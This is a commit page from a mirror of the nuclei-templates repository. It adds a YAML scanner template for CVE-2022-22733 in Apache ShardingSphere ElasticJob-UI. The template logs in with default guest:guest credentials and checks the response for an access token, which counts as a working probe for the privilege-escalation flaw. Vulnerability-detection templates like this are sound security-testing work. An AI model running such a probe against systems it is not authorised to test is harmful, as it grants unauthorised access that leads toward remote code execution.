daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add template for CVE-2022-22733 Apache ShardingSphere ElasticJob-UI privilege escalation

patch-1
Zer0verflow 2023-05-11 10:57:33 +08:00 committed by GitHub
parent 27e95ef56e
commit 80d33d7741
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 31 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

31
http/cves/2022/CVE-2022-22733.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2022-22733
info:
name: CVE-2022-22733 Apache ShardingSphere ElasticJob-UI privilege escalation
author: Zeyad Azima
severity: medium
description: CVE-2022-22733 is an Apache ShardingSphere ElasticJob-UI privilege escalation vulnerability and you could achieve Remote Code Execution checkout the Reference URL for full analysis of the vulnerability.
reference: https://www.vicarius.io/vsociety/blog/cve-2022-22733-apache-shardingsphere-elasticjob-ui-privilege-escalation
requests:
- method: POST
path:
- "{{BaseURL}}/api/login"
headers:
Host: "192.168.0.162:8888"
User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
Accept: "application/json, text/plain, */*"
Accept-Language: "en-US,en;q=0.5"
Accept-Encoding: "gzip, deflate"
Content-Type: "application/json;charset=utf-8"
Access-Token: ""
Content-Length: "39"
Origin: "http://192.168.0.162:8888"
DNT: "1"
Connection: "close"
Referer: "http://192.168.0.162:8888/"
body: '{"username":"guest","password":"guest"}'
matchers:
- type: word
words:
- '"accessToken":'